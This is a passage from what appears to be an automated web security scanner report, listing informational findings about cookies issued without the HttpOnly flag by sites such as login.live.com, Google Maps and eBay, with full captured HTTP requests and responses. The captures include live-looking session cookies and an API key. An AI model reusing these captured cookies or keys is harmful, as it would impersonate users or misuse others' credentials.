rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NC8JZjpr3hepMJpsGd7ZVglywUUUvJuj5VZ2CE0t8dfV5LwaUQjNwVbd1KDsr77b16gERAB5waljbHAN6H98Pl0AhsBm+/8/n4kBAKNvbGggCQBQCKFjwO/4vNXlthu+mZudlKzcvg2eD0PWpTrOGzZmDhy+kT1EmcwBoAO0IKtoEgPyuRXsrKhjAPdfOqp1WY2DrEwqBJauu/w5tyh+BT9TzPYbaJrEufdJZOhzK/ze/4INKhyYkuK043aby26fhjo1fRPvQfg8Vv9ky31mCuwE2rn7zHOg9uUTIR9/pT+2Q1cNcL2sBgO2QKXWJUHA0GoPCnCuTu4FXIceSN86XOvYLtaDGb/VE3/cWEa5h+xLU/n1eRAWVNpONAcc8IVRrB3yeJ+KZN3OVRWFiTolD4d3Q8UaXRlyCCjx/p+9x7pkknB2pF7nnL/SmYr2Lwjns5uaNn1lO0BlYt1u9k1UDPZSahS4NFOuD3X7Z5sqpUTrt4mKNQSJi4y9vt051ZS0wALkL1C0RPG1PmP3SYnWNvGCkLyo687UCx7dnLLq3YM2Jf98NxWkSunKBwuza1h43Y+vH2Bpt/cCUySR+dYMe9BO5npHhLxmC5mqL9dUOwlx16FRiJl2J98XY1lkRTF3T4F3eP+K3/BSXRJVMGHbX5U7MkXwp2xFhrmN4IvwhCjXOUYPuMOXAkZdv1pAEzw/DPAosnP9wPXrDue1sA1RI0N90Ohj/cQIHkT9B2IKlnJUzb+ZwBq7LMhDN0uh2H+F2T/IPQM8Kb8cPmV36Ob6LJGyvSJW7JlTQPJbnJrHWuYc/f8oc1hOALQN1Uh3yf7Ttj9AjZg8L2p/XRPHZooO2apNxEVKh9IITo1syr0JzfL9xVF/mdaXIcTytwEWVcX8z+P+GimfPZDdpXVtm6bNTVaRwiAtECRbgIwqHinNlb6kYt5dvK5n3gpnddFIIx6JUu99J8AmRXTwOmFiplx4GT5tbsXq6MRCZ6YoegbYXQtj9uuSZY/aVe8bIoKBgB40J2xpeACsFVdmudeB9yPdJbGhAuE2tc6hB8iQ0tKRVP0DfEAn5r/MnT5QbieDGHG2/yzv1qvm6NtoCZnilGVcciWqVvbwutNO4pGGWhC8E+oCe3Iqgcr4x+AP0bWSXCBf68XSjr3AyN62bAor0Dk1J9FAbXW9n7wvgQGxi6YrNuupRHSk3JnEjRwwFfq6wHwnF94B9We6QFXJY1ME6z6t2mKyVJBEcuuoLF2cnfBLokoHsm9TyeNXvGUQ6wdYC1AjzJVIFdFPsWKKK5OidfKjVBnGRyasdUPinEXieAmNfxMPANj+005urzTjHzAqPGSxIS31eC04uTJ+TSVEF5ww9PPNQHdBDjcbIwwuREREsUZDTmZiikJKGA6HzdIjgDSIrEzNpjwxQJvJ71PMSxdc0m+0PApKF46AMpju8YcoicKsjnMDKIuSbXRYc14=; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:25 GMT; Path=/
Last-Modified: Tue, 19 Jul 2011 16:02:25 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 19 Jul 2011 17:02:25 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:25 GMT
Content-Length: 5953

//AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC)
var rsi_now= new Date();
var rsi_csid= 'C07583';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

14.76. http://lct.salesforce.com/sfga.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lct.salesforce.com
Path:   /sfga.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sfga.js HTTP/1.1
Host: lct.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 14:20:43 GMT
Set-Cookie: BIGipServerlct-pool=87351818.38687.0000; path=/
Content-Length: 9247

var _kd = document;
var _kdlh = _kd.location.href;
var _ki,_kq,_kv;
var _kwtlForm;
var _kretURL;
var _kwtlOnSubmit;
var _koid;

function __krand() {
return Math.round(Math.random() * 256).toString
...[SNIP]...

14.77. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089470&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/zune/forum/zune_install-player/mp3-conversion/efa762b3-d6d3-478f-9a59-1cd7414b0374
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; wlidperf=throughput=2&latency=1306; MSPRequ=lt=1311089374&co=1&id=273572; MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14574
Content-Type: text/html; charset=utf-8
Expires: Tue, 19 Jul 2011 15:37:02 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1311089882&co=1&id=273572; path=/;version=1
Set-Cookie: MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3$uuid-1895cee1-27dd-48d7-8aac-abac4dc44583$uuid-893a9771-4ec1-49d2-b1d0-11979f88bfa5; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1H49 V: 0
Date: Tue, 19 Jul 2011 15:38:01 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1H49 2011.07.09.12.24.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDB073, -- Version: 11,0,18312,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

14.78. http://m.webtrends.com/dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif?&dcsdat=1311118707061&dcssip=www.bing.com&dcsuri=/community/site_blogs/b/travel/default.aspx&dcsqry=%3FFORM=TRGRMR&WT.tz=-5&WT.bh=18&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Bing%2520Travel%2520blog%2520-%2520Site%2520Blogs%2520-%2520Bing%2520Community&WT.js=Yes&WT.jv=1.5&WT.bs=1065x723&WT.fi=Yes&WT.fv=10.3&WT.sli=Not%20Installed&WT.slv=Version%20Unavailable&WT.em=uri&WT.le=ISO-8859-1&WT.dl=0&WT.seg_1=Unregistered&WT.cg_n=Blog-Travel%20blog&WT.wtsv=1&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1307061370&WT.vt_f_tlv=1307061019&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=173.193.214.243-3661456592.30151123.1311118707064&wtDrillDir=/community/;/community/site_blogs/;/community/site_blogs/b/;/community/site_blogs/b/travel/&wtEvtSrc=www.bing.com/community/site_blogs/b/travel/default.aspx HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/community/site_blogs/b/travel/default.aspx?FORM=TRGRMR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAFajJU56oCVOoAEAAHks6E0aK+hNKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAABWoyVOeqAlTpQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 23:38:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAFajJU56oCVOoAEAAGwVJk5sFSZOKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAABWoyVOeqAlTpQAAABsFSZObBUmTi0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 23:38:20 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.79. http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcsxia05c00000s926v0z4tru_3w4l/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsxia05c00000s926v0z4tru_3w4l/dcs.gif?&dcsdat=1311088769174&dcssip=support.microsoft.com&dcsuri=/contactus/&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Help%2520and%2520Support&WT.js=Yes&WT.jv=1.5&WT.bs=1065x723&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.dcsvid=GUID=b99db294605ea749842ddaca50c2f3af%26HASH=94b2%26LV=20115%26V=3&WT.wtsv=1&WT.co_f=173.193.214.243-3661456592.30151123&WT.vt_f_tlh=1311019116&WT.vt_f_tlv=1311015720&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=173.193.214.243-3661456592.30151123.1311088769178&wt_date=2011/7/19&wt_dos=1&wtDrillDir=/contactus/&wtEvtSrc=support.microsoft.com/contactus/&sup_cid=cu_selector&sup_cln=en-us&sup_ct=dm&sup_ln=en-us&sup_sd=gn HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAABSPJE4UjyROoAEAAHks6E0aK+hNKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAAAUjyROFI8kTpQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Jul 2011 15:19:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zNjYxNDU2NTkyLjMwMTUxMTIzAAAAAAARAAAACgAAAGuQJE5khyROfQEAAM3WzU3M1s1NHwEAAH876U1/O+lNcAAAACZ81E0lfNRNzQAAAF9OFE5fThROGwEAANuOJE7EjiRODQAAAOtv2E3rb9hNdQAAAHqgJU56oCVOoAEAAHks6E0aK+hNKwIAALSNJE6fjCROZQEAAPy68E38uvBN8gEAAIx0/017dP9NRwAAAIePAE6GjwBOewAAAIVEFE5rRBROegAAAIpEFE6KRBROFQAAAISlFU5CoRVOVwAAAFmNF04xjBdOCQAAABMAAABrkCROZIckTmYAAAB/O+lNfzvpTRUAAADbjiROxI4kTkQAAAB6oCVOeqAlTpQAAAB5LOhNGivoTS0AAAD8uvBN/LrwTTEAAACHjwBOho8ATkMAAACKRBROa0QUTiAAAACEpRVOQqEVTgAAAAA-; path=/; expires=Fri, 16-Jul-2021 15:19:22 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.80. http://majornelson.com/gamercard/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://majornelson.com
Path:   /gamercard/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gamercard/index.php HTTP/1.1
Host: majornelson.com
Proxy-Connection: keep-alive
Referer: http://majornelson.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 23:43:14 GMT
Content-Type: text/x-json
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 23:43:14GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: mn_gamercard=%7B%22gamer_score%22%3A%2252867%22%2C%22gamer_image%22%3A%22http%3A%2F%2Favatar.xboxlive.com%2Favatar%2FMajor%2520Nelson%2Favatarpic-l.png%22%2C%22recent_games%22%3A%5B%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2F-z%2F%2BV%2F02dsb2JhbA9ECgUAGwEfLFlVL2ljb24vMC84MDAwIAAAAAAAAPy6P%2BA%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2FUh%2Fhx%2F1Gdsb2JhbA9ECgUAGwEfL1ZWL2ljb24vMC84MDAwIAAAAAAAAPteGE0%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2FKR%2Fv2%2F0Gdsb2JhbA9ECgUAGwEfLFpRL2ljb24vMC84MDAwIAAAAAAAAP-ZGzY%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2Foc%2F1B%2F12dsb2JhbA9ECgQMGgAfWSlaL2ljb24vMC84MDAwIAAAAAAAAPhuzb4%3D.jpg%22%2C%22http%3A%2F%2Ftiles.xbox.com%2Ftiles%2Fgd%2Frx%2F02dsb2JhbA9ECgQNGwEfV1smL2ljb24vMC84MDAwIAAAAAAAAPze2p4%3D.jpg%22%5D%7D; expires=Wed, 20-Jul-2011 11:43:14 GMT
Content-Length: 606

{"gamer_score":"52867","gamer_image":"http://avatar.xboxlive.com/avatar/Major%20Nelson/avatarpic-l.png","recent_games":["http://tiles.xbox.com/tiles/-z/+V/02dsb2JhbA9ECgUAGwEfLFlVL2ljb24vMC84MDAwIAAAA
...[SNIP]...

14.81. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps?file=api&v=2&sensor=false&key=ABQIAAAAHjOizKxN3j2yyJbuGOLs0hSEzOL_OikNPvVpm0ynWQuaOLPCJRTyZcUWYx2cYT4gRtYy4kNqIbxYmw HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: maps.google.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=ee9b3b8ecc4b4ec2:TM=1311109135:LM=1311109135:S=cayOe7PfiMmmwdYV; expires=Thu, 18-Jul-2013 20:58:55 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Date: Tue, 19 Jul 2011 20:58:55 GMT
Server: mfe
Cache-Control: private
Content-Length: 10101
X-XSS-Protection: 1; mode=block
Expires: Tue, 19 Jul 2011 20:58:55 GMT

var G_INCOMPAT = false;function GScript(src) {document.write('<' + 'script src="' + src + '"' +' type="text/javascript"><' + '/script>');}function GBrowserIsCompatible() {if (G_INCOMPAT) return false;
...[SNIP]...

14.82. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=24432;evt=17182;cat1=21312;cat2=21313;rand=43948 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adv_ic=BxIAAACYkAROIAYGAAFJAABAYSAHIAtAAACV4AIXAIbgAhcDP8zXTUAfQC8B9FkgB0AMIAAAAuACFwDN4AIXAcPL4AEvAWla4AEvALHgAhcByGDgARcAoOACFwG0ViBXIFtAAAA44AIXAetc4AEXADHgAhcB+1/gAUcAJOACFwDY4AJfAAPgAhcANuACLwHcyuABpwDT4AK/ANngAhcAPuACvwDT4AIXAIwhQcCnANDgAhcBR1PgAY8AzOACFwGiUuABFwDJ4AIXAOPgAo8BbLHgAY8EzU8AAApBBAIAAAA=; lyc=CgAAAATKGAdOACAAAd1YIASgAAQDSAAAteAKFwaqUQAAVpQEYC8BvUSgLCAABnlXAAB47gNgFwFwXyAQoAAHQVMAAMD19U1ADgG0R0AFgAAASiAGARTz4AkXQAAAD6AX4AMAQC8CCrrwYEcBUFvgARkGpUwAAO/s52AXAWhW4AEXAaFF4AELAJXgAi8DJE0AAA==; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:24:02 GMT
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=CwAAAASniB1OACAAAZVbIASgAAYkTQAAyhgHYBcB3VigFCAABANIAAC14AoXBqpRAABWlARgLwG9RCAooAAGeVcAAGB3JWAXAXBfoBQgAAZBUwAAwPX1IGUDAAC0RyAEoAAASiAHARTz4AkXQAAAD6AX4AMAQC8CCrrwYEcAUOACvwalTAAA7+znYBcBaFbgATEBoUXgAQvgBY8BAAA=; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Thu, 18-Jul-2013 12:24:02 GMT

GIF89a.............!.......,...........D..;

14.83. http://mobileweb.ebay.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobileweb.ebay.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mobileweb.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/mobileweb/ebay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702fe^cguid/3666b2e01300a47a44d622a6ffc19372500702fe^trm/svid%3D94316858148500702fe^; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83687^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf87%5Epsi%3DAsoIQKvY*%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4ndvwpfiuf%3F%3Cw%7B%28tbgfgi35%3E-13143b29c30
Cache-Control: must-revalidate, no-store, no-transform
